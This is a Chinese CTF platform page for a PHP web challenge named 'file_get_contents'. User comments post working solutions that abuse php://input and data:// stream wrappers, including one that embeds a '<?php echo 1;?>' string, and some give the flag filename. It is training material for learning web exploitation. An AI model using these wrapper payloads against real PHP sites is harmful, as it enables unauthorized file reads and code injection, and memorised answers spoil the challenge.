file_get_contentsWEB 未解决

分数: 30 金币: 3
题目作者: harry
一  血: npfs
一血奖励: 2金币
解  决: 5486
提  示:
描  述:
file_get_contents????
评论
azerl7 9天前

题解如其名,不光是要解题,还要多学学 file_get_contents 的内容

回复 0

whshkdh 23天前

curl -X POST "http://160.202.254.160:11489/?ac=hello&fn=php://input" -d "hello"

回复 0

ggsea 1月前

POST /?ac=flag_content&fn=php://input HTTP/1.1 Host: 160.202.254.160:11097 Content-Type: application/x-www-form-urlencoded Content-Length: 12 flag_content

回复 0

lgb 1月前

http://160.202.254.160:16626/?ac=123&fn=data://text/plain,123

回复 0

New_wl 1月前

两种解题方法 1,扫描地址得到flag.txt,内容是bugku。让$ac=$fn。?ac=bugku$fn=flag.txt 2,通过data://伪协议,可以使用任意字符串。?fn=data://text,plain,abc&ac=abc

回复 3

西红柿dun牛腩 1月前

?ac=bugku&fn=flag.txt

回复 0

西红柿dun牛腩 1月前

如果变量ac的值=fn变量指向的文件名的文件内容,就输出flag。

回复 0

icyskin 2月前

http://160.202.254.160:19133/?ac=a&fn=data://text/olain,a

回复 0

Hacker23 3月前

http://160.202.254.160:15622/?ac=%3C?php%20echo%201;?%3E&fn=data://text/plain,%3C?php%20echo%201;?%3E

回复 0

Hacker23 3月前

http://160.202.254.160:15622/?ac=hello&fn=data://text/plain,hello

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

兄弟不要颓废 攻破了该题 4分钟前
jwleft 攻破了该题 32分钟前
tabwux 攻破了该题 7小时前
耶耶耶耶叶 攻破了该题 16小时前
Lapis 攻破了该题 18小时前
Jam 攻破了该题 19小时前
耶时候搜索 攻破了该题 1天前
333454242423 攻破了该题 1天前
mystery 攻破了该题 1天前
kevin02686 攻破了该题 2天前
风度空山 攻破了该题 2天前
N1KO_ 攻破了该题 2天前
xianbuxianxi 攻破了该题 2天前
emp233 攻破了该题 2天前
少年,你的剑太重了 攻破了该题 2天前
eternal丿 攻破了该题 3天前
CQchen 攻破了该题 3天前
ItsAllOver 攻破了该题 4天前
雀回题 攻破了该题 5天前
风雨无阻1 攻破了该题 5天前
问题反馈